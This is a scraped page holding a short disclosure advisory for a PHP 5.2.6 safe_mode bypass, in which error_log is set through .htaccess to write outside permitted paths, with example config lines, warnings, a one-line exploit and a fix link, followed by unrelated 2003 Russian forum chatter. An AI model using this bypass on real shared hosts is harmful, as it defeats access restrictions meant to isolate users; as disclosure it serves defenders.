2833

PHP 5.2.6 (error_log) safe_mode bypass

PHP 5.2.6 (error_log) safe_mode bypass ]Affected Software: PHP 5.2.6Vendor: http://www.php.net- --- 0.Description ---PHP is an HTML-embedded scripting language. Much of its syntax is borrowedfrom C, Java and Perl with a couple of unique PHP-specific features thrownin. The goal of the language is to allow web developers to writedynamically generated pages quickly.error_logThey allow you to define your own error handling rules, as well as modifythe way the errors can be logged. This allows you to change and enhanceerror reporting to suit your needs.- --- 0. error_log const. bypassed by php_admin_flag ---The main problem is between using safe_mode in global modephp.ini­:safe_mode = Onand declaring via php_admin_flag...php_admin_flag safe_mode OnWhen we create some php script in /www/ and try call to:ini_set("error_log", "/hack/");or in /www/.htaccessphp_value error_log "/hack/bleh.php"Result:Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. Thescript whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in/www/phpinfo.php on line 4It was for safe_mode declared in php.ini. But if we usephp_admin_flag safe_mode Onin httpd.conf, we will get onlyWarning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. Thescript whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in/www/phpinfo.php on line 4syntax in .htaccessphp_value error_log "/hack/blehx.php"is allowed and bypass safe_mode.example exploit:error_log("", 0);- --- 2. How to fix ---Fixed in CVShttp://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markupNote:Do not use safe_mode as a main safety.
0
Administrator@@_17 Февраля 2003, 20:11
A
Administrator@@_17 Февраля 2003, 20:11

Будет сегодня ссылочка.

Посмотри, на втором уровне, там где пишется сколь сегодня и всего, появился пункт редактировать.
Его жмешь.
Потом вводишь свой ник и пароль.
А там надеюсь уже разберешся, если же нет то пиши.

0
  • 0
  • 0
Administrator@@_18 Февраля 2003, 13:02
A
Administrator@@_18 Февраля 2003, 13:02

Спасибо огромное, разобралась :)

0
  • 0
  • 0
Administrator@@_18 Февраля 2003, 22:47
A
Administrator@@_18 Февраля 2003, 22:47

Всегда рад помочь.

0
  • 0
  • 0
-1984-18 Февраля 2003, 22:50
-
-1984-18 Февраля 2003, 22:50
Administrator@@_
...Всегда рад помочь....

а я, вот, 400,000 репу запостила. За это сюрприз обещали... Ан нет его, сюрприза-то! И что делать? (.....:)) )

0
  • 0
  • 0
max118 Февраля 2003, 22:52
M
max118 Февраля 2003, 22:52
-1984-
...3 а я, вот, 400,000 репу запостила. За это сюрприз...

обещанного три года ждут

0
  • 0
  • 0
-1984-18 Февраля 2003, 22:58
-
-1984-18 Февраля 2003, 22:58
max1
...обещанного три года ждут...

Дарофф "полуночникам"!:))
Нет у меня столького терпения. Через 3 года у меня дети будут, о форуме и думать забуду.

0
  • 0
  • 0
max118 Февраля 2003, 22:59
M
max118 Февраля 2003, 22:59
-1984-
...5 Дарофф "полуночникам"!:)) Нет у меня столького терпения....

странный срок беременности... даже у слонов тока полтора года :-))

0
  • 0
  • 0
-1984-18 Февраля 2003, 23:02
-
-1984-18 Февраля 2003, 23:02
max1
...странный срок беременности... даже у слонов тока полтора...

!!!!!!!!!!!!!!!!!!!!!! Гонишь! Это не срок беременности, а планы. Вот.

0
  • 0
  • 0